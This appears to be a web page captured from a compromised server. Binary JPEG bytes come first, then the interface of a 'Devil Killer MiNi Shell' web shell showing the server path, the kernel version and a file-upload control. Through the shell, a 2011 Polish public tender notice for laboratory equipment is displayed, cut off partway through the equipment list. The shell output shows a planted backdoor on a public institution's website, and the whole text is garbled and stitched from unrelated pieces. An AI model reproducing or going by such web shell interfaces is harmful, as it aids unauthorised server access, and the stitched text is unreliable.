JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111115/379466-N-2011.html

<p class="kh_header"><b>Olsztyn: Dostawa specjalistycznej aparatury i sprzętów laboratoryjnych</b><br>
<b>Numer ogłoszenia: 379466 - 2011; data zamieszczenia: 15.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk , ul. Tuwima 10, 10-747 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5234692, faks 089 5234693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pan.olsztyn.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa specjalistycznej aparatury i sprzętów laboratoryjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę specjalistycznej aparatury i sprzętów laboratoryjnych do Instytutu Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk w Olsztynie. Zamówienie podzielono na 5 Części:
Część 1 - Mini cieplarka  - szt. 2; 
Część 2 - Chłodziarko-zamrażarka laboratoryjna - szt. 1; Zamrażarka laboratoryjna - szt. 1; Chłodziarka laboratoryjna jednokomorowa - szt. 1;
Część 3 - Waga analityczna - szt.1; Łaźnia wodna z funkcją wytrząsania - szt. 1; Wytrząsarka o ruchu drgającym - szt. 1; Stoper elektroniczny laboratoryjny - szt. 2;
Część 4 - Automatyczna płuczka mikropłytek - szt. 2; 
Część 5 - Czytnik Elisa - szt. 1.
Wymagana gwarancja - min. 24 miesięcy dla wszystkich Części 1, 2, 4; 36 miesięcy dla Wagi analitycznej w Części 3 oraz 12 miesięcy dla pozostałego sprzętu w tej części; min 24 miesiące dla Części 5 (gwarancja jest jednym z kryterium oceny w Części 5).
Dodatkowe wymagania:
1.	Wykonawca będzie zobowiązany do dostawy do laboratorium;pracowni w siedzibie Zamawiającego, wskazanego w umowie, montażu (nie dot. stoperów), uruchomienia aparatury i sprzętu, a w przypadku Części 1, 4, 5 - instruktażu pracowników Zamawiającego w zakresie obsługi, użytkowania i podstawowej konserwacji;kalibracji sprzętu w ramach ceny oferty.  
2.	Po uruchomieniu w siedzibie zamawiającego, aparatura i sprzęt powinien być gotowy do poprawnej bezkolizyjnej pracy w zakresie wszystkich składowych elementów i funkcji, zgodnie z opisem tych elementów w niniejszym załączniku. Niedopuszczalne jest, aby dla zapewnienia prawidłowej pracy sprzętu konieczne było instalowanie dodatkowych elementów (urządzeń) lub oprogramowania w późniejszym czasie, szczególnie za dodatkową opłatą.
3.	W okresie obowiązywania gwarancji Wykonawca zapewni nieodpłatny serwis specjalistycznego sprzętu, zestawu grzewczych i mieszających sprzętów laboratoryjnych. 
4.	Czas reakcji: przyjęte zgłoszenie - podjęta naprawa - max. 48 godz. (Części 1, 2, 3, 4) max. 72 godz. (Część 5)
5.	Możliwość zgłoszeń - 24 h na dobę, 365 dni w roku (Część 1, 2, 3).
6.	Czas naprawy gwarancyjnych zobowiązujących dostawcę do wymiany urządzenia (podzespołu) na nowy - max. 3 naprawy.
7.	Maksymalny termin naprawy - 14 dni.
8.	W przypadku czasu trwania naprawy gwarancyjnej dłuższego niż 14 dni - dostawca zapewnia sprzęt zastępczy na czas trwania naprawy (dot. Części 2; 5).
9.	W przypadku nie dokonania naprawy ww. określonych terminie, nastąpi wymiana wadliwego egzemplarza aparatury lub sprzętu, na nowy o parametrach nie gorszych niż uszkodzony, bez dodatkowych opłat.
10.	Wymiana aparatury i  sprzętu, w okresie gwarancji na nowy, nastąpi w przypadku 3 awarii uniemożliwiających ich eksploatację w pełnym zakresie funkcjonalnym.
11.	W przypadku wymiany uszkodzonego sprzętu lub aparatury, na nowy lub wymiany podzespołu obowiązywać będą warunki gwarancji i serwisu, wynikające ze złożonej oferty.
12.	Transport aparatury lub sprzętu do miejsca lokalizacji serwisu gwarancyjnego i z powrotem w okresie gwarancji odbywać się będzie na koszt i ryzyko Wykonawcy.
13.	Zamawiający zastrzega sobie prawo odstąpienia od umowy ze względu na wadę fizyczną lub prawną dostarczonego sprzętu lub aparatury.
14.	Dostarczony sprzęt i aparatura musi posiadać instrukcję obsługi w j. polskim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.43.60.00-0, 42.94.30.00-8, 38.41.20.00-6, 38.54.00.00-2, 39.71.11.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie ustanawia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 oraz nr 6 do SIWZ - wykaz wykonanych trzech dostaw urządzeń, aparatury i sprzętu diagnostycznego, każda na kwotę nie mniejszą niż 12500,00 zł, w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbioru, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie. 
-wykonawcy załączają dokument potwierdzający, że dostawy zostały wykonane należycie wg załącznika nr 6 do SIWZ.
-wykaz musi zawierać wartość, przedmiot, daty wykonania i odbiorców.
-jeżeli wykonawca na potwierdzenie spełnienia ww. warunku udziału w postępowaniu przedstawi w wykazie wykonanych dostaw wartości wyrażone w innej walucie niż PLN, zamawiający do oceny spełnienia warunków przeliczy podaną wartość po średnim kursie tej waluty w stosunku do PLN publikowanym przez NBP z dnia ogłoszenia postępowania,
-jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia powyższe składa, co najmniej jeden z nich.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane złożenie oświadczenia - Załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Atesty i świadectwa dopuszczenia do obrotu oferowanych urządzeń (jeżeli dotyczą):
a)	deklaracje zgodności,
b)	Certyfikaty: ISO, CE.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem. 
2. Wypełniona przez Wykonawcę Specyfikacja oferowanego produktu wg załącznika nr 1 do Specyfikacji Istotnych Warunków Zamówienia  
3. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia Formularz Oferty 
4. Sporządzony przez Wykonawcę Formularz cenowy wg wzoru stanowiącego załącznik nr 3 do Specyfikacji Istotnych Warunków Zamówienia Formularz Cenowy.
5. Materiały producenta potwierdzające spełnienie wymaganych parametrów technicznych tj. broszury, foldery, instrukcja obsługi itp. (w j. polskim)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, obejmujących:
1.	dla zmiany terminu realizacji przedmiotu zamówienia:
-ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej;
2.	dla zmiany sposobu spełnienia świadczenia:
a)	zmiany technologiczne, w szczególności:
-niedostępność na rynku urządzenia wskazanego w dokumentacji przetargowej spowodowaną zaprzestaniem produkcji lub wycofaniem z rynku urządzenia;
-pojawieniem się na rynku urządzenia nowszej generacji/technologii pozwalającego na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
3.	dla pozostałych zmian:
-zmiana sposobu dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
4.	nie stanowi istotnej zmiany umowy w rozumieniu art. 144 Pzp, w szczególności:
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b)	zmiany danych teleadresowych oraz osób wskazanych do kontaktów między stronami.

5.	Zmiany treści umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci obustronnie podpisanego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pan.olsztyn.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.11.2011 godzina 12:00, miejsce: Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mini cieplarka  - szt. 2
1	Objętość 9,2 - 9,5 litra
2	Temperatura pracy od 5/10C powyżej temperatury otoczeni do 60C
3	Dokładność nastawy temperatury przy 37C + ; -0,6
4	Nierównomierność rozkładu temperatury przy 37C - 0,65C
5	Napięcie zasilania 230V
6	Bezprzewodowy system rejestracji temperatury, wilgotności i ciśnienia
7	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chłodziarko-zamrażarka laboratoryjna - szt. 1
1	Wysokość: min 1750 mm, max 1850 mm
2	Szerokość:  min 750 mm, max 850 mm
3	Głębokość: min 550, max 650 mm
4	Kolor: biały
5	Waga: max 130 kg
6	Obudowa: ocynkowana stal galwanizowana powlekana lakierem
7	Pojemność użytkowa chłodziarki: min 329 l, max 350 l
8	Pojemność użytkowa zamrażarki: min 80 l, max 85 l
9	Zakres temperatur w chłodziarce: min +2°C, max +14°C
10	Zakres temperatur w zamrażarce: min -20°C, max -30°C
11	Dokładność regulacji temperatury: min +;- 1°C
12	Wnętrze chłodziarki: stal nierdzewna
13	Wnętrze zamrażarki: aluminium powlekane tworzywem
14	Drzwi chłodziarki: z oknem szklanym
15	Drzwi zamrażarki: pełne
16	Izolacja: bezfreonowa pianka poliuretanowa
17	Czynnik chłodniczy w chłodziarce: R-134a (HFC)
18	Czynnik chłodniczy w zamrażarce: R-407D (HFC)
19	Chłodzenie w chłodziarce: obieg wymuszony
20	Chłodzenie w zamrażarce: obieg naturalny
21	Sterownik: mikroprocesorowy z wyświetlaczem temperatury typu LED
22	Kompresor chłodziarka-zamrażarka: min 150 W, max 170W 
23	Kółka transportowe: 4
24	Regulowane stopki: 2
25	Alarm zbyt niskiej i zbyt wysokiej temperatury
26	Alarm uchylenia drzwi
27	Podtrzymanie nastaw w pamięci nieulotnej podczas przerwy w dopływie prądu
28	Funkcje auto-diagnostyczne
29	Przyłącze stykowe do centralnych systemów monitoringu
30	Drzwi zamykane na klucz
31	System cyklicznego odszraniania nie powodujący wahań temperatury w komorze chłodziarki
32	2 porty kablowe (oddzielne dla chłodziarki i zamrażarki) do wprowadzania zewnętrznych urządzeń pomiarowych
33	Możliwość podłączenia opcjonalnego rejestratora temperatury z powiadamianiem na telefon komórkowy o stanach awaryjnych 
34	Gwarancja - min 24 miesiące

Zamrażarka laboratoryjna - szt. 1
1	Wysokość: min. 840mm, max. 860mm
2	Szerokość: min. 550mm, max 570mm
3	Głębokość: min. 600mm, max 620mm
4	Wysokość komory: min. 620 mm, max 640mm
5	Szerokość komory: min. 400mm, max 420mm
6	Głębokość komory: min. 380mm, max. 400mm
7	Kolor: biały
8	Waga: max. 35 kg
9	Materiał obudowy: blacha malowana proszkowo
10	Materiał komory: tworzywo sztuczne
11	Pojemność komory: min. 85 L
12	Zakres temperatury pracy: -25C do 0C
13	Dokładność regulacji temperatury: min. +;-1,0oC
14	Stabilność temperatury w -10oC: ?0,4
15	Sterownik: mikroprocesorowy z zewnętrznym wyświetlaczem LCD
16	Drzwi zewnętrzne: pełne
17	Obieg powietrza: obieg naturalny
18	Ilość półek szklanych: 2
19	Moc znamionowa: 120W
20	Zasilanie 50Hz: 230V
21	Gwarancja - min. 24 miesiące

Chłodziarka laboratoryjna jednokomorowa - szt. 1;
1	Wysokość: min. 590mm, max 610mm
2	Szerokość: min. 540mm, max 560mm
3	Głębokość: min. 640mm, max 620mm
4	Wysokość komory: min. 420 mm, max 440mm
5	Szerokość komory: min. 460mm, max 480mm
6	Głębokość komory: min. 290mm, max. 310mm
7	Kolor: szary
8	Waga: max. 33 kg
9	Materiał obudowy: blacha malowana proszkowo
10	Materiał komory: aluminium
11	Pojemność komory: min. 65 L
12	Zakres temperatury pracy: min. 0oC, max. +10oC
13	Dokładność regulacji temperatury: min. +;-1,0oC
14	Stabilność temperatury w +4oC: ?0,5
15	Sterownik: mikroprocesorowy z zewnętrznym wyświetlaczem LCD
16	Drzwi zewnętrzne: szklane
17	Obieg powietrza: obieg wymuszony
18	Ilość półek: 2
19	Regulowane położenie prowadnic
20	Wewnętrzne gniazdo elektryczne z uziemieniem
21	Zabezpieczenie: klasy 1.0 zgodnie z DIN 12880
22	Moc znamionowa: 160W
23	Zasilanie 50Hz: 230V
24	Gwarancja - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Waga analityczna - szt.1
1	Obciążenie maksymalne: 220 g
2	Obciążenie minimalne: 10 mg
3	Dokładność odczytu: 0,1 mg
4.	Zakres tary: -220 g
5	Powtarzalność: 0,1 mg
6	Liniowość: ? 0,2 mg
7	Wymiar szalki: O 85-90mm
8	Czas stabilizacji: max. 3,5s
9	Dryft czułości: 1ppm/C w temperaturze +15o -  +35C
10	Temperatura pracy: +10 - +40C
11	Zasilanie:110-230V AC;50 ÷60Hz
13,5 ÷ 16 V DC;1,1A
12	Kalibracja wewnętrzna (automatyczna)
13	Wyświetlacz LCD (z podświetlaniem)
14	Interfejs RS 232
15	Masa netto;brutto: 5,6; 8,3kg
16	Wymiary opakowania: 495x 385x515mm ?10mm
17	Duża komora ważenia z odsuwanymi bocznymi szybami oraz ruchomą szybą górną
18 	Możliwość ważenia ładunków poza pomostem wagowym (tzw. ważenie podszalkowe) 
19	Gwarancja - min. 36 miesięcy

Łaźnia wodna z funkcją wytrząsania i dodatkowym wyposażeniem - szt. 1
1	Amplituda wytrząsania 15 mm
2	Wodoodporny panel sterowania i cyfrowy wyświetlacz
3	Kontrola poziomu cieczy
4	Dźwiękowy sygnał alarmowy w razie awarii
5	Zdejmowalna platforma wytrząsająca
6	Zakres temp. 20 - 100oC
7	Poj. cieplna 2kW
8	Prędkość 20 - 200 obr. na min
9	Stabilność temp. ? 0,2 oC
10	Otwór łaźni 50 x 30 x 18cm
11	Wymiary zewn. (szer. X głęb. X wys.) 70 x 35 x 26cm
12	Waga [kg] 19,4
13	Objętość 8 - 20 L
14	Łaźnia musi być wyposażona w:
-podnoszoną pokrywę ze stali nierdzewnej (do + 100C),
-platformę uniwersalną na kolby o pojemności 25-1000 ml (łącznie z zestawem sprężyn)
15	Gwarancja - min. 12 miesięcy

Wytrząsarka o ruchu drgającym - szt. 1
1	Zakres prędkości: 600 do 2700 obr. na min
2	Wymiary (szer. x gł. x wys.): 122 x 165 x 165 mm
3	Ciężar: 4.0 kg
4	Wymagane zasilanie: 220V 50 Hz, 250 mA
5	Gwarancja - min. 12 miesięcy

